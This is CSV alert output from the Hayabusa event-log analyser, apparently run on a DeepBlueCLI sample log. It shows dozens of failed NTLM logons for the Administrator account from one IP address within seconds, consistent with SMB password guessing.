2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
